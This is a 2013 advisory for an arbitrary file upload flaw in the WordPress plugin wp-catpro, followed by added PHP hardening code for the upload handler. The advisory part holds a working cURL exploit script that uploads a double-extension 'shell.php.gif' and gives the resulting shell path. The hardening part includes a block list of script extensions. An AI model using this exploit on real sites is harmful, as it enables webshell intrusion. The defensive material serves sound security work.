
WordPress plugin wp-catpro arbitrary file upload

Posted on 2013-2-27 20:12:43
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------

Author => Zikou-16
Email => zikou16x@gmail.com
Tested on: Windows 7, Backtrack 5r3
Download: http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####

#=> Exploit info:
------------------
# An attacker can upload file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path where we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

#=> Exploit
-----------
<?php
$uploadfile = "zik.php.gif";
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
// "@" prefix: legacy (pre-PHP 5.6) cURL syntax for attaching a local file;
// "folder" is a client-supplied destination directory field.
curl_setopt($ch, CURLOPT_POSTFIELDS,
    array('Filedata' => "@$uploadfile",
          'folder'   => '/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
<?php
phpinfo();
?>
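The weakness the info block above describes is the classic double-extension case: the handler accepts "jpg", "gif" and "png" by looking only at the last extension, so a name such as shell.php.gif passes, and the exploit additionally sends a client-chosen "folder" field with the upload. The following is an added hardening example for a SWFUpload-style upload.php, written for this page; it is not the plugin's code and not the advisory author's. It assumes the file arrives as $_FILES['Filedata'] (the field the exploit posts) and that the destination directory is fixed server-side; the function names, the constant names and the uploads directory are my own choices.

```php
<?php
// Added hardening example (not the wp-catpro plugin's or the advisory author's code).
// Assumptions: replaces the extension check and destination handling of a
// SWFUpload-style upload.php; $_FILES['Filedata'] is the uploaded file and
// $uploadDir is a fixed directory from which the web server serves no scripts.

declare(strict_types=1);

// Only the final extension decides the type, and only these are accepted.
// The value is the MIME type the file content must actually have.
const ALLOWED_IMAGE_TYPES = [
    'jpg' => 'image/jpeg',
    'png' => 'image/png',
    'gif' => 'image/gif',
];

// Any of these appearing as *any* dot-separated segment of the name is rejected,
// so "shell.php.gif" is refused even though its last extension is "gif".
const SCRIPT_SEGMENTS = ['php', 'php3', 'php4', 'php5', 'php7', 'phtml', 'phar', 'htaccess', 'cgi', 'pl', 'sh'];

/**
 * Returns the allowed extension (lower case) for $clientName, or null if the
 * name must be rejected. Pure string logic, so it is easy to unit test.
 */
function validate_upload_name(string $clientName): ?string
{
    // Drop any directory components the client may have sent (either separator).
    $base = basename(str_replace('\\', '/', $clientName));
    $segments = explode('.', strtolower($base));
    if (count($segments) < 2 || $segments[0] === '') {
        return null;                 // no extension, or a dotfile such as ".htaccess"
    }
    $ext = array_pop($segments);
    if (!array_key_exists($ext, ALLOWED_IMAGE_TYPES)) {
        return null;                 // final extension is not an allowed image type
    }
    foreach ($segments as $seg) {
        if (in_array($seg, SCRIPT_SEGMENTS, true)) {
            return null;             // double extension such as "x.php.gif"
        }
    }
    return $ext;
}

/**
 * Verifies the bytes on disk really are the image type the extension claims.
 */
function content_matches_extension(string $tmpPath, string $ext): bool
{
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($tmpPath) !== ALLOWED_IMAGE_TYPES[$ext]) {
        return false;
    }
    // getimagesize() parses the image header and returns false for non-images.
    return getimagesize($tmpPath) !== false;
}

/**
 * Handles one upload. The destination directory is fixed server-side; a
 * client-supplied "folder" field is never consulted. Returns the stored name.
 */
function handle_upload(array $file, string $uploadDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an HTTP upload');
    }
    $ext = validate_upload_name((string) $file['name']);
    if ($ext === null) {
        throw new RuntimeException('file name rejected');
    }
    if (!content_matches_extension($file['tmp_name'], $ext)) {
        throw new RuntimeException('file content does not match extension');
    }
    // The client-supplied name never reaches disk: random name plus vetted extension.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($uploadDir, '/') . '/' . $stored;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0644);              // readable, never executable
    return $stored;
}

// Endpoint behaviour: fixed uploads directory (assumed), no "folder" parameter.
if (PHP_SAPI !== 'cli' && isset($_FILES['Filedata'])) {
    try {
        echo handle_upload($_FILES['Filedata'], __DIR__ . '/uploads');
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'rejected';
    }
}
```

validate_upload_name('shell.php.gif') returns null while validate_upload_name('photo.gif') returns 'gif', which is the check the vulnerable handler lacked. Independently of this code, the uploads directory should be configured so the web server never hands files in it to a script handler; the validator assumes that is in place and is a second layer, not a replacement for it.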